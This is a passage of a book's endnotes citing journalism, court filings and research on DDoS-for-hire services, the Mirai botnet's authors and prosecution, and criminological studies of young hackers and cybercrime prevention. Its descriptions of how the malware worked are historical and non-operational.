Hutchings%20%26%20Clayton%202015%20Deviant
%20Behavior.pdf?sequence=1&isAllowed=y.
in one year: Brian Krebs, “Following the Money Hobbled VDoS Attack-for-Hire Service,” Krebs on Security, June 6, 2017, krebsonsecurity.com/2017/06/following-the-money-hobbled-vdos-attack-for-hire-service.
“off-line in a heartbeat”: Krebs, “Israeli Online Attack Service.”
largest DDoS mitigation companies in the world: Ryan Brunt, Prakhar Pandey, and Damon McCoy, “Booted: An Analysis of a Payment Intervention on a DDoS-for-Hire Service” (presented at the Workshop on the Economics of Information Security, California, June 2017), 5, http://damonmccoy.com/papers/vdos.pdf.
no technical knowledge required: In 2010, researchers discovered that twelve out of the top twenty malware in the world were sold using a pay-per-install model, in which cybercriminals pay for the number of devices they want infected: Juan Caballero et al., “Measuring Pay-per-Install: The Commoditization of Malware Distribution,” Proceedings of the 20th USENIX Security Symposium, August 8, 2011, www.usenix.org/legacy/events/sec11/tech/full_papers/
Caballero.pdf.
fourteen gigabits/second: Krebs, “Israeli Online Attack Service.”
Hack Forums once did: Brian Krebs, “Hackforums Shutters Booter Service Bazaar,” Krebs on Security, October 31, 2016, https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/.
known as nodes: See generally “About Tor Browser,” https://tb-manual.torproject.org/about.
to communicate confidentially: Ty McCormick, “The Darknet: A Short History,” Foreign Policy, December 9, 2013, https://foreignpolicy.com/2013/12/09/the-darknet-a-short-history/.
“any impairment to the”: 18 U.S. Code §1030 (a) [(a)5(A)] and (e) [(e)8] 8.
stress test websites: Krebs, “Hackforums Shutters Booter Service.”
all responsibility for any such attacks: Justyna Chromik et al., “Booter Website Characterization: Toward a List of Threats” (presented at the XXXIII Simpósio Brasileiro de Redes de Computadores e Sistemas Distribuídos, January 2015), 5, https://annasperotto.org/publication/papers/2015/chromik-sbrc-2015.pdf.
not stressing their own websites: Krebs, “Israeli Online Attack Service.”
“We do try to market”: Alice Hutchings and Richard Clayton, “Exploring the Provision of Online Booter Services,” Deviant Behavior 37, no. 10 (2016): 1172.
give up on Incapsula: Mike Waterhouse, “Rutgers University’s Computer Network Under Attack; Website, Internet Access Down on Campus,” ABC7NY, September 28, 2015, https://abc7ny.com/rutgers-university-computer-network-attack/1006255/.
cybersecurity was not working: Hallel Yadin, “Rutgers Students Want Refunds After Fifth DDoS Attack in One Year,” New Brunswick Today, October 11, 2015, https://newbrunswicktoday.com/2015/10/11/rutgers-students-want-refunds-after-fifth-ddos-attack-in-one-year/.
May 2016: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS and the Criminal Ecosystem,” YouTube, April 9, 2020, at 17:31, www.youtube.com/watch?v=NQPJeDNdG6w.
“lightspeed” and “thegenius”: United States Department of Justice, December 5, 2017, https://www.justice.gov/opa/press-release/file/1017596/download.
half a million computers: Brian Krebs confirmed that Josiah had contributed to Qbot: Krebs, “Who Is Anna-Senpai?” Information on Qbot can be found at Phil Muncaster, “Massive Qbot Botnet Strikes 500,000 Machines Through WordPress,” Infosecurity Magazine, October 8, 2014, https://www.infosecurity-magazine.com/news/massive-qbot-strikes-500000-pcs/. On Qbot, see Pascal Geenens, “IoT Botnets: The Journey So Far and the Road Ahead,” in Kambourakis et al., Botnets, 52–61.
Bashlite, Gafgyt, Lizkebab, and Torlus: Krebs, “Who Is Anna-Senpai?”
doing DDoS mitigation: Krebs, “Who Is Anna-Senpai?”
Josiah agreed: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 17:46.
$15,000 a month: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 19:54.
Poodle Corp: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 17:07.
specialized in finding vulnerabilities: United States v. Paras Jha et al., Government’s Sentencing Memo, Case No. 3:17-cr-00165-TMB, filed September 11, 2018, 19.
controlling the botnet: Qbot was written in C, but the C2 code was written in Go, a programming language developed by Google that handles concurrency processing well. The unusual choice of Go was key evidence when Brian Krebs linked Anna_Senpai to Paras. See Krebs, “Who Is Anna-Senpai?” Paras was in charge of building the C2. See United States v. Paras Jha et al., Plea Agreement (as to Paras Jha), 3:17-cr-00165-TMB, filed December 5, 2017, 6.
1,300 web-connected cameras: Tom Spring, “LizardStresser IoT Botnet Part of 400Gbps DDoS Attacks,” Threatpost, June 30, 2016, https://threatpost.com/lizard-stresser-iot-botnet-part-of-400gbps-ddos-attacks/119006/.
companies that hosted them: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 25:40.
Poodle Corp’s surprise: On takedown procedures, see Alice Hutchings et al., “Taking Down Websites to Prevent Crime,” 2016 APWG Symposium on Electronic Crime Research (eCrime), 2016, 1–10.
about the future: Government’s Sentencing Memo, 15–16. Paras explained his choice of Mirai Nikki, claiming that the series “literally defines the genre … on psychological thrillers” (16).
the series Shimoneta: Krebs, “Who Is Anna-Senpai?”
“Just made this post”: Anna-Senpai, “Killing All Telnets,” Hack Forums, July 10, 2016, https://hackforums.net/showthread.php?tid=5334225.
OG_Richard_Stallman: Krebs, “Who Is Anna-Senpai?”
DDoS victims: Krebs, “Who Is Anna-Senpai?”
Disinformation was in the air: The hacks of the DNC were discussed extensively on hackforums.net: https://hackforums.net/search.php?action=results&sid=c01228abaf99c946f09e08f6cb4074da&sortby
=lastpost&order=asc.
every seventy-six minutes: Manos Antonakakis et al., “Understanding the Mirai Botnet,” Proceedings of the 26th USENIX Security Symposium, British Columbia, Canada, August 16–18, 2017, 19, https://www.usenix.org/system/files/conference/usenixsecurity
17/sec17-antonakakis.pdf.
The result: forty-one minutes: Andrew McGill, “The Inevitability of Being Hacked,” Atlantic, October 28, 2016, www.theatlantic.com/technology/archive/2016/10/we-built-a-fake-web-toaster-and-it-was-hacked-in-an-hour/505571. While McGill doesn’t specify that the botnet that infected his pretend toaster was Mirai, his exercise was a response to a Mirai DDoS attack, and it’s likely that Mirai did indeed infect it.
GameOver ZeuS: See generally Josephine Wolff, You’ll See This Message When It’s Too Late: The Legal and Economic Aftermath of Cybersecurity Breaches (Cambridge, MA: MIT Press, 2018), 59–78.
a million Windows machines worldwide: Brian Krebs, “‘Operation Tovar’ Targets ‘Gameover’ ZeuS Botnet, CryptoLocker Scourge,” Krebs on Security, June 2, 2014, https://krebsonsecurity.com/2014/06/operation-tovar-targets-gameover-zeus-botnet-cryptolocker-scourge/.
only forty-five agents: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 04:45.
“Alaska’s uniquely positioned”: Graff, “How a Dorm Room.”
all their botnets: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 35:30.
VDoS founders in Israel: Krebs, “Alleged vDOS Proprietors.”
they went dark as well: Brian Krebs, “Are the Days of ‘Booter’ Services Numbered?,” Krebs on Security, October 27, 2016, krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered.
Midwestern accent: Zack Sharf, “Douglas Rain, Voice of HAL 9000 in ‘2001: A Space Odyssey,’ Dies at 90—Here’s Why Stanley Kubrick Cast Him,” IndieWire, November 12, 2018, https://www.indiewire.com/2018/11/douglas-rain-dead-hal-9000–2001-a-space-odyssey-stanley-kubrick-cast-1202019828/.
Heuristically Algorithmic Language-Processor: Aisha Harris, “Is HAL Really IBM?,” Slate, January 7, 2013, slate.com/culture/2013/01/hal-9000-ibm-theory-stanley-kubrick-letters-shed-new-light-on-old-debate.html.
understood their potential: The security community warned about the problem. Kim Zetter, “The Biggest Security Threats We’ll Face in 2016,” Wired, January 1, 2016, https://www.wired.com/2016/01/the-biggest-security-threats-well-face-in-2016/. See also Bruce Schneier, Click Here to Kill Everybody: Security and Survival in a Hyper-connected World (New York: Norton, 2018).
operational on August 1: The antimalware organization Malware Must Die posted a blog entry about a new scanning botnet of which they had samples as soon as August 4. It also noted the IP address of the scanner. “MMD-0056–2016-Linux/Mirai, How an Old ELF Malcode Is Recycled,” Malware Must Die, September 1, 2016, https://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html. That IP address belonged to a New York hosting company used by Josiah White: Government’s Sentencing Memorandum, 19–20.
knock it off-line: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS and the Criminal Ecosystem,” YouTube, April 9, 2020, at 27:07, www.youtube.com/watch?v=NQPJeDNdG6w; Robert Webb, “Host.us DDOS Attack,” NANOG Email Archive, August 3, 2016, https://www.mail-archive.com/nanog@nanog.org/msg86857.html.
NSA tools leak: Lightning Bow, “Government Investigating Routernets?,” Hack Forums, August 5, 2016, https://hackforums.net/showthread.php?tid=5364849. Lightning Bow is video game reference—it’s a weapon in Call of Duty: Black Ops III.
mislead law enforcement: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 27:31.
the abusive server: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 28:28.
disinfect the botnet themselves: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 32:50.
took its website off-line: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 30:24.
When Mirai infects: Mirai source code at https://github.com/jgamblin/Mirai-Source-Code.
when its host is rebooted: Antonakakis et al., “Understanding the Mirai Botnet,” Proceedings of the 26th USENIX Security Symposium, British Columbia, Canada, August 16–18, 2017, 1094, https://www.usenix.org/system/files/conference/usenixsecurity17/
sec17-antonakakis.pdf.
Detected files are deleted: Antonakakis et al., “Understanding the Mirai Botnet.”
scanning or attacking: Or both. Mirai used concurrent processes to scan and attack.
trying to connect to them: The scanner blocklists forty-three IP ranges, such as those allocated to the General Electric Corporation, the U.S. Post Office, and the Pentagon. Some entries on the list make little sense (the General Electric Corporation?), which suggests that Josiah copied the blocklist from some older malware. The scanner discards blocklisted IP addresses.
IoT devices do not: Zhen Ling et al., “New Variants of Mirai and Analysis,” in Encyclopedia of Wireless Networks, ed. Xuemin (Sherman) Shen, Xiaodong Lin, and Kuan Zhang (Cham, Switzerland: Springer, 2020), https://www.cs.ucf.edu/~czou/research/Mirai-Springer-2020.pdf.
records the address: The scanner sends out 160 SYN packets to these addresses. If the destination’s port 23 is open and Telnet enabled, it will respond with an ACK packet—short for “Acknowledged” or “Yes, I can hear you. Please proceed.” Receiving a favorable reply, the scanner puts the IP address in its target table.
switches to attack mode: Attack.c at https://github.com/jgamblin/Mirai-Source-Code/blob/master/mirai/bot/attack.c.
brute force dictionary attack: Ben Herzberg, Igal Zeifman, and Dima Bekerman, “Breaking Down Mirai: An IoT DDoS Botnet Analysis,” Imperva (blog), https://www.imperva.com/blog/malware-analysis-mirai-ddos-botnet/?redirect=Incapsula.
The last entry in the dictionary: Dictionary at line 122–85 of scanner.c, https://github.com/jgamblin/Mirai-Source-Code/blob/master/mirai/bot/scanner.c.
changed the credentials: A. L. Johnson, “Thousands of Ubiquiti AirOS Routers Hit with Worm Attacks,” Broadcom Endpoint Protection: Library, May 19, 2016, https://community.broadcom.com/symantecenterprise/
communities/community-home/librarydocuments/viewdocument?DocumentKey=426cee5f-7aa7–4be7-a569–4718ee573660&CommunityKey=1ecf5f55–9545–44d6-b0f4–4e4a7f5f5e68&tab=library-documents.
scanning for new conscripts: While Mirai behaved a lot like self-replicating malware, experiencing exponential growth, it was neither a worm, a vorm, nor a virus. The version of Mirai that ran on an IoT device did the scanning, but not the loading. It did not try to copy itself and infect another device with its progeny. A centralized loading server was responsible for distributing copies of Mirai to engage in further scanning and attacking. In his dissertation, Vesselin Bontchev called malware using a centralized loader an “octopus.” The terminology did not catch on.
On September 20: “DDoS Mitigation Firm Has History of Hijacks,” Krebs on Security, September 20, 2016, https://krebsonsecurity.com/2016/09/ddos-mitigation-firm-has-history-of-hijacks/.
full force of his arsenal: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 37:08.
“That was worrisome”: Peterson’s quote comes from Garrett Graff, “How a Dorm Room Minecraft Scam Brought Down the Internet,” Wired, December 13, 2017. According to a team from UC Berkeley, the total cost of added bandwidth and energy consumption from the Mirai attack on Krebs on Security came to $323,973.95: “Project RioT,” UC Berkeley School of Information, 2018, groups.ischool.berkeley.edu/riot.
“Mirai was the first botnet”: Graff, “How a Dorm Room.”
news organizations from DDoS attacks: Andy Greenberg, “Google Wants to Save News Sites from Cyberattacks—for Free,” Wired, February 24, 2016, www.wired.com/2016/02/google-wants-save-news-sites-cyberattacks-free.
the attacks resumed: Brian Krebs, “How Google Took on Mirai, KrebsOnSecurity,” Krebs on Security, February 3, 2017, krebsonsecurity.com/2017/02/how-google-took-on-mirai-krebsonsecurity/#more-37945.
“greatest hits” of DDoS techniques: Dan Goodin, “How Google Fought Back Against a Crippling IoT-Powered Botnet and Won,” Ars Technica, February 2, 2017, arstechnica.com/information-technology/2017/02/how-google-fought-back-against-a-crippling-iot-powered-botnet-and-won.
175,000 IP addresses: Goodin, “How Google Fought Back.”
Google thwarted the attack: Goodin, “How Google Fought Back.”
Paras had a big bag of tricks: Mirai, for example, used syn-cookie mitigation as an attack type. See Vladimir Unterfingher, “Technical Analysis of the Mirai Botnet Phenomenon,” Heimdal Security, last updated April 16, 2021, https://heimdalsecurity.com/blog/mirai-botnet-phenomenon/.
“LARGEST DDOS EVER”: According to Cloudflare, the largest DDoS in history was the attack on GitHub, a popular online code repository, in February 2018. At its peak, incoming traffic achieved a rate of 1.3 terabytes per second, sending packets at a rate of 126.9 million per second. See “Famous DdoS Attacks,” Cloudflare Learning Center, Cloudflare, accessed February 25, 2022, https://www.cloudflare.com/learning/ddos/famous-ddos-attacks/.
overwhelm a normal ISP router: Claims about DDoS attack size also have a “units” problem. Do we measure attacks based on bits/second, bytes/second, packets/second, or requests/second?
valuable resource is WHOIS: WHOIS has become less valuable as the result of the European Union’s General Data Protection Regulations. The GDPR has required removal from the database information such as the name of the person who registered the domain, as well as their phone number, physical address, and email address. Matthew Kahn, “WHOIS Going to Keep the Internet Safe?” Lawfare, Wednesday, May 2, https://www.lawfareblog.com/whois-going-keep-internet-safe; “Who Is Afraid of More Spams and Scams?” Brian Krebs, https://krebsonsecurity.com/2018/03/who-is-afraid-of-more-spams-and-scams/#more-42946.
a d-order: 18 U.S.C. §2703(d).
applying for search warrants: In addition to showing probable cause, prosecutors must show that ordinary investigative techniques have failed and that agents will not collect conversations unrelated to the investigation. Judges usually review the progress of the investigation with prosecutors every week to see if a warrant is still necessary. After thirty days, the warrant expires.
subpoenas are confidential: Witnesses and prosecutors can waive the confidentiality requirement.
devices in Alaska: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 39:30.
they served subpoenas on: Graff, “How a Dorm Room.”
physical space: A point made fifteen years ago by Jack Goldsmith and Tim Wu, Who Controls the Internet: Illusions of a Borderless World (New York: Oxford University Press, 2008).
“I’ve run against”: Graff, “How a Dorm Room.”
raided the boy’s house: Graff, “How a Dorm Room.”
350 gigabits/second: Brian Krebs, “Who Is Anna-Senpai, the Mirai Worm Author?,” Krebs on Security, January 18, 2017, krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author.
“is a teenage male”: Brian Krebs, “‘Operation Tarpit’ Targets Customers of Online Attack-for-Hire Services,” Krebs on Security, December 13, 2016, https://krebsonsecurity.com/2016/12/operation-tarpit-targets-customers-of-online-attack-for-hire-services/.
The attack lasted three days: Luckykessie, “Network Issues 27th–30th September 2016,” Hypixel-Minecraft Server and Maps, October 10, 2016, hypixel.net/threads/network-issues-27th-30th-september-2016.876087. See also Krebs, “Who Is Anna-Senpai?”
a digital black hole: Krebs, “Who Is Anna-Senpai?”
The discussion between the two men: The entire transcript of their chat can be found at https://krebsonsecurity.com/wp-content/uploads/2017/01/annasenpaichat.txt.
“So today”: Anna_Senpai, “World’s Largest Net: Mirai Botnet, Client, Echo Loader, CNC Source Code Release,” Hack Forums, September 30, 2016, hackforums.net/showthread.php?tid=5420472.
vulnerability is announced: Tim Willis, “Policy and Disclosure: 2021 Edition,” Google Project Zero (blog), June 14, 2021, googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html.
the complete version: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 38:40.
aggressively killed other malware: Twenty-four unique binaries were uploaded to Virus Total: Antonakakis et al., “Understanding the Mirai Botnet,” 1102.
a fabricated story: Krebs, “Who Is Anna-Senpai?”
It began: Antonakakis et al., “Understanding the Mirai Botnet,” 1105–6; Samit Sarkar, “Massive DDoS Attack Affecting PSN, Some Xbox Live Apps (Update),” Polygon, October 21, 2016, https://www.polygon.com/2016/10/21/13361014/psn-xbox-live-down-ddos-attack-dyn.
point of the attack: https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-antonakakis.pdf.
a teenage boy: Shortly after the Dyn attack, Hack Forums removed their Booting Services board: Brian Krebs, “Hackforums Shutters Booter Service Bazaar,” Krebs on Security, October 31, 2016, https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/.
TalkTalk: Mark Tighe, “Larne Hacker Aaron Sterritt, aka ‘Vamp,’ Faces Fresh Charges in US,” The Times, July 5, 2020, https://www.thetimes.co.uk/article/larne-hacker-aaron-sterritt-aka-vamp-faces-fresh-charges-in-us-7089csqsw.
“UK national resident”: National Crime Agency, NCA Northern Ireland Performance Q1 2018/19 (April–June 2018), August 22, 2018, https://www.nipolicingboard.org.uk/sites/nipb/files/publications/
ni-performance-report-apr-june-2018.pdf.
for the attacks: Brian Krebs, “New Charges, Sentencing in Satori IoT Botnet Conspiracy,” Krebs on Security, June 26, 2020, krebsonsecurity.com/2020/06/new-charges-sentencing-in-satori-iot-botnet-conspiracy.
significant advertising revenue: One hundred thousand figure from United States v. Paras Jha, Clickfraud Plea Agreement, 5, https://www.justice.gov/opa/press-release/file/1017541/download.
ever made with DDoS: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 43:59.
$14,000 from DDoS-ing: United States of America v. Paras Jha, Plea Agreement, December 5, 2017, 5, https://www.justice.gov/opa/press-release/file/1017541/download (“As a result of this scheme, Jha and his co-conspirators received as proceeds approximately one hundred bitcoin, valued on January 29, 2017, at over $180,000”); United States v. Paras Jha and Dalton Norman, Government’s Sentencing Memo, filed September 11, 2018, 29.
$16 billion per annum: Brian Krebs, “Mirai IoT Botnet Co-Authors Plead Guilty,” Krebs on Security, December 13, 2017, https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/.
nine hundred thousand routers: “Deutsche Telekom Hack Part of Global Internet Attack,” Deutsche Welle, November 29, 2016, https://www.dw.com/en/deutsche-telekom-hack-part-of-global-internet-attack/a-36574934.
Liberia’s entire internet: Elie Bursztein, “Inside the Infamous Mirai IoT Botnet: A Retrospective Analysis,” Cloudflare Blog, December 14, 2017, blog.cloudflare.com/inside-mirai-the-infamous-iot-botnet-a-retrospective-analysis; Catalin Cimpanu, “Hacker ‘BestBuy’ Admits to Hijacking Deutsche Telekom Routers with Mirai Malware,” Bleeping Computer, July 22, 2017, https://www.bleepingcomputer.com/news/security/hacker-bestbuy-admits-to-hijacking-deutsche-telekom-routers-with-mirai-malware/.
a bunch of teenagers: Brian Krebs, “New Charging, Sentencing in Satori,” Krebs on Security, June 25, 2020, https://krebsonsecurity.com/2020/06/new-charges-sentencing-in-satori-iot-botnet-conspiracy/.
“They dumped the source code”: Brian Krebs (BrianKrebs), “Expert: IoT Botnets the Work of a ‘Vast Minority,’” VoIP-Info Forum, January 24, 2018, www.voip-info.org/forum/threads/expert-iot-botnets-the-work-of-a-‘vast-minority’.22335.
evidence was irrefutable: Purdue CERIAS, “2020–04–08 CERIAS-Mirai-DDoS,” at 39:45.
just five years: See: Krebs, “Mirai IoT Botnet”; Kelly Heyboer and Ted Sherman, “Former Rutgers Student Admits to Creating Code That Crashed Internet,” NJ, December 13, 2017, https://www.nj.com/education/2017/12/rutgers_student_charged
_in_series_of_cyber_attacks.html#incart_river_mobile_home.
“I really don’t think”: United States v. Paras Jha, Partial Transcript of Imposition of Sentence, September 18, 2018, 10.
“I didn’t think of them”: Partial Transcript of Imposition, 14.
“the divide between”: Graff, “How a Dorm Room.”
“cybersecurity matters”: Graff, “How a Dorm Room.”
escaped jail time: Graff, “How a Dorm Room.”
“‘You’re in a hole’”: Partial Transcript of Imposition, 15. The transcript says “start digging,” which I assume is a mistranscription.
“my family, my friends”: Partial Transcript of Imposition, 16.
yes or no: Partial Transcript of Imposition, 18.
“I want to thank the FBI”: Partial Transcript of Imposition, 19.
“picked a better role model”: Partial Transcript of Imposition, 21.
Evgeny Morozov: Evgeny Morozov, To Save Everything, Click Here: The Folly of Technological Solutionism (Washington, DC: PublicAffairs, 2013).
“Africa? There’s an App”: “Africa? There’s an App for That,” Wired, August 7, 2012, https://web.archive.org/web/20120807145838/https://www.wired.
co.uk/news/archive/2012-08/07/africa-app-store-apple.
Solutionism is ubiquitous in cybersecurity: Solutionism is pervasive in academic research as well, in large part because cybersecurity is usually studied and taught in computer-science departments. But not all research in this area is solutionist. See, e.g., Josephine Wolff, You’ll See This Message When It Is Too Late: The Legal and Economic Aftermath of Cybersecurity Breaches (Cambridge, MA: MIT Press, 2018). Recent anthropological work on hackers focuses on social upcode, the norms and rules of the hacker/cybersecurity community. See, e.g., Gabriella Coleman, Hacker, Hoaxer, Whistleblower, Spy: The Many Faces of Anonymous (London: Verso, 2014). Economic analysis: See, e.g., Ross Anderson, “Why Information Security Is Hard—An Economic Perspective,” Proceedings 17th Annual Computer Security Applications Conference, 2001, https://www.acsac.org/2001/papers/110.pdf. Sociology: Jonathan Lusthaus, The Industry of Anonymity (Cambridge, MA: Harvard University Press, 2018), 10–17. Law: See, e.g., Daniel J. Solove and Woodrow Hartzog, Breached!: Why Data Security Law Fails and How to Improve It (Oxford: Oxford University Press, 2022). It should be noted that there is an entire academic field known as “Science, Technology and Society Studies,” or STS, that studies how technology is affected by, and affects, social upcode.
Poverty and Famines: Amartya Sen, Poverty and Famines: An Essay on Entitlement and Deprivation (Oxford: Oxford University Press, 1981).
no famine: Sen, Poverty and Famines, 55.
inflationary shortfall: Sen, Poverty and Famines, 148.
not enough ways: Sen, Poverty and Famines, 93–94.
Security of Connected Devices: CA Civ Code §1798.91.04 (2018).
better security decisions: “SEC Proposes Rules on Cybersecurity Risk Management, Strategy, Governance, and Incident Disclosure by Public Companies,” press release, SEC, March 9, 2022, https://www.sec.gov/news/press-release/2022–39.
to be illusory: M. Tcherni et al., “The Dark Figure of Online Property Crime: Is Cyberspace Hiding a Crime Wave?,” Justice Quarterly 33, no. 5 (2016): 890–911; Ross Anderson et al., “Measuring the Changing Cost of Cybercrime,” 18th Annual Workshop on the Economics of Information Security, 2019.
Under international law: States often sign mutual legal assistance treaties that obligate them to assist each other in criminal prosecutions. See also the Council of Europe Convention on Cybercrime (Budapest Convention), which was designed to increase cooperation but has yet to make a significant impact. Christopher D’Urso, Nowhere to Hide: Investigating the Use of Unilateral Alternatives to Extradition in U.S. Prosecutions of Transnational Cybercrime (DPhil diss., Oxford University, 2021).
corporate-earnings information: Henry Meyer, Irina Reznik, and Hugo Miller, “U.S. Catches Kremlin Insider Who May Have Secrets of 2016 Hack,” Reuters, January 3, 2022, https://www.bloomberg.com/news/articles/2022–01–03/kremlin-insider-klyushin-is-said-to-have-2016-hack-details. See also Department of Justice, U.S. Attorney’s Office, District of Massachusetts, “Russian National Extradited for Role in Hacking and Illegal Trading Scheme,” December 20, 2021.
banking apps: Once infecting a computer, usually through email attachments, Emotet rifles through inboxes. It sends old email messages to the correspondents with malicious links or Word documents laced with Emotet copies. If the recipient clicks or opens the document and enables macros, the recipient’s computer becomes infected.
Under the auspices of EMPACT: “World’s Most Dangerous Malware EMOTET Disrupted Through Global Action,” press release, Europol, January 27, 2021, https://www.europol.europa.eu/media-press/newsroom/news/world’s-most-dangerous-malware-emotet-disrupted-through-global-action.
“can’t arrest our way out”: Jonathan Lusthaus, “The Criminal Silicon Valley Is Thriving,” The New York Times, November 29, 2019.
perpetrated with computers: Some traditional crimes have migrated online and have been transformed. See, e.g., Danielle Keats Citron, Hate Crimes in Cyberspace (Cambridge, MA: Harvard University Press, 2014).
steals credit card numbers: See generally Kevin Poulsen, Kingpin: How One Hacker Took Over the Billion-Dollar Cybercrime Underground (New York: Crown, 2011).
drawn in this book: Hutchings notes a difference between cyber-enabled and cyber-dependent criminals. For example, cyber-enabled criminals begin offending because they feel unable to achieve “success” as society defines it (what criminologist Robert Merton called structural strain) and are presented an opportunity to change their social circumstances through illegal behavior: Alice Hutchings, “Cybercrime Trajectories: An Integrated Theory of Initiation, Maintenance and Desistance,” in Crime Online: Correlates, Causes, and Context, ed. Thomas J. Holt (Durham, NC: Carolina Academic Press, 2016), 117–40.
not worried about getting caught: Hutchings, “Cybercrime Trajectories.”
“Um, it is hard”: Hutchings, “Cybercrime Trajectories.”
ability to investigate: Hutchings, “Cybercrime Trajectories.”
entering adult life: Hutchings, “Cybercrime Trajectories.”
“Um, no real reason”: Alice Hutchings, “Theory and Crime: Does It Compute?” (PhD diss., Griffith University, 2013), https://research-repository.griffith.edu.au/bitstream/handle/10072/365227/
Hutchings_2013_02Thesis.pdf?sequence=1.
employment status: Russell Brewer et al., Cybercrime Preventions (Cham, Switzerland: Palmgrave Pilot, 2016), 5.
cyber-enabled offending: Hutchings, “Cybercrime Trajectories.”
hostile to women: Aja Romano, “What We Still Haven’t Learned from Gamergate,” Vox, January 7, 2021, https://www.vox.com/culture/2020/1/20/20808875/gamergate-lessons-cultural-impact-changes-harassment-laws.
to be undeserving: Hutchings, “Cybercrime Trajectories.”
deny responsibility: Hutchings, “Theory and Crime.”
“What started off as”: United States v. Paras Jha and Dalton Norman, Government’s Sentencing Memo, 14.
get a lot out of hacking: In an early small study of hackers who break software protection for illegal pirating, the twenty-four respondents reported that financial rewards were not motivating: Sigi Goode and Sam Cruise, “What Motivates Software Crackers?,” Journal of Business Ethics 65, no. 2 (2006): 121.
“online relationships”: The National Cyber Crime Unit (NCCU) also found that the primary motivation for hacking is completing a challenge and the sense of intellectual accomplishment that it brings. “Pathways into Cyber Crime,” National Crime Agency, January 13, 2017, 5, https://www.nationalcrimeagency.gov.uk/who-we-are/publications/6-pathways-into-cyber-crime-1/file. Equally important is the sense of belonging to community and proving prowess to one’s peers. The desire for street cred pushed hackers to develop their skills and escalate their exploits. Financial motivations were decidedly secondary.
choose not to engage: Hutchings, “Cybercrime Trajectories”; Brewer et al., Cybercrime Preventions, 41–42.
high-threat letters: Brewer et al., Cybercrime Preventions, 41–42.
“Greetings friend”: Hattie Jones, David Maimon, and Wuling Ren, “Sanction Threat and Friendly Persuasion Effects on System Trespassers’ Behaviors During a System Trespassing Event,” Cybercrime Through an Interdisciplinary Lens, ed. Thomas J. Holt (London: Routledge, 2016).
subsequent bad actions: Jones, Maimon, and Ren, “Sanction Threat.”
“Where offenders see”: Brewer et al., Cybercrime Preventions, 119.
visit from the police: Under the U.K. NCCU Prevent Program, when a young person is suspected of engaging in cybercriminality, police officers go on a “cease-and- desist” visit at the young person’s home. “Pathways into Cyber Crime,” 5–6. They alert the up-and-coming hacker that the person’s actions are visible to law enforcement. They also describe the legal consequences of getting caught.
purpose is promising: Brewer et al., Cybercrime Preventions, 96. L0pht, the hacking group of which Mudge was a member, founded the security company @Stake in 2000. @Stake was bought by Symantec in 2004. See Joseph Menn et al., “FBI Probes Hacking of Democratic Congressional Group,” Reuters, July 29, 2016. For the transition from hacker to security professional, see Matt Goerzen and Gabriella Coleman, “Wearing Many Hats: The Rise of the Professional Security Hacker,” Data & Society, January 2022. See also Nicolas Auray and Danielle Kaminsky, “The Professionalisation Paths of Hackers in IT Security: The Sociology of a Divided Identity,” Annales des Télécommunications 62 (2007): 1312–26.
hacking competitions: Catherine Stupp, “European Police Aim to Keep Young Hackers from Slipping into Cybercrime,” The Wall Street Journal, July 14, 2022.
“Role models will”: “Pathways into Cyber Crime,” 9. The United States government has invested significantly in cybersecurity education programs and competition, including CyberPatriot, picoCTF, Collegiate Cyber Defense Competition, US Cyber Camps, and US Cyber Combine.
support and advocacy: In addition, mentors produce better results when their professional development is a motivation for their participation (presumably motivating them to try harder), and mentorship sessions are longer and more frequent.
strong ones: Brewer et al., Cybercrime Preventions, 72.
gaming forums: According to the Hacker Profiling Project, 61 percent of hackers started hacking before age sixteen. Raoul Chiesa et al., Profiling Hackers: The Science of Criminal Profiling as Applied to the World of Hacking (Boca Raton, FL: CRC Press, 2008), 74. The NCCU reports that the average age of those suspected of and arrested for criminal hacking in the U.K. in 2015 was seventeen. By contrast, the average age of those arrested for drug crimes was thirty-seven and for economic crimes was thirty-nine. “Pathways into Cyber Crime,” 4. According to an early study of hackers, “A characteristic trait of all of our hacker interviewees recruited by organizations is the precocity of the emergence of a passion for IT: remarkably they agree on the fact that the enthusiasm emerges at the age of approximately ten”: Auray and Kaminsky, “Professionalisation Paths,” 1315.
given their skills: Lusthaus, Industry of Anonymity, 10–17.
Eastern Europe: Lusthaus, “Criminal Silicon Valley.”
to draft talent: U.S. law enforcement and intelligence service personnel have long recruited at hacking conferences: Janus Kopfstein, “NSA Trolls for Talent at Def Con, the Nation’s Largest Hacker Conference,” Verge, August 1, 2012, https://www.theverge.com/2012/8/1/3199153/nsa-recruitment-controversy-defcon-hacker-conference. In response to the Snowden revelations, and the hostility and betrayal many in the community felt, DEF CON organizers asked the U.S. government to sit out the 2013 meetings: Jim Finkle, “NSA at DEFCON? More Like No Spooks Allowed,” NBC News, July 11, 2013, https://www.nbcnews.com/technolog/nsa-defcon-more-no-spooks-allowed-6c10600964.
